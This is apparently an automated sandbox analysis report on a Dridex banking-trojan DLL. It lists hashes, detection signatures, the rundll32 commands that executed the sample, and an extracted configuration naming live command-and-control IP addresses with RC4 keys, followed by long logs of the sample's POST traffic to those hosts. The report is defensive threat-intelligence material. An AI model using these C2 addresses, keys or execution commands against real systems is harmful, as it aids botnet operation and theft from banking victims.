Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.23616.12095

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.23616.12095 (renamed file extension from 12095 to dll)
Analysis ID:510697
MD5:50b17cce4a58067e69bf19e006320ec4
SHA1:26275bcc652ed3498cf73c771169c3e367fde96c
SHA256:8a9bb370f658f04ebd313ba3d074e3fe63230f5eb8709ecbb6b92933f35559bd
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6440 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6464 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6508 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6484 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6560 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6576 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.447081469.0000000000DB0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000003.00000002.871199283.000000006EF91000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000002.00000003.446543317.00000000006B0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000005.00000003.459341786.00000000033F0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000000.00000003.475297637.0000000000EE0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.3.rundll32.exe.dadb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              5.3.rundll32.exe.340db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                2.3.rundll32.exe.6cdb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  6.3.rundll32.exe.dadb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    3.3.rundll32.exe.dcdb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 6.3.rundll32.exe.dadb55.0.raw.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllReversingLabs: Detection: 40%
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49998 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.870351399.000000006F057000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.873021020.000000006F057000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.23616.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBCEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.6:49757 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.6:49760 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.6:49762 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
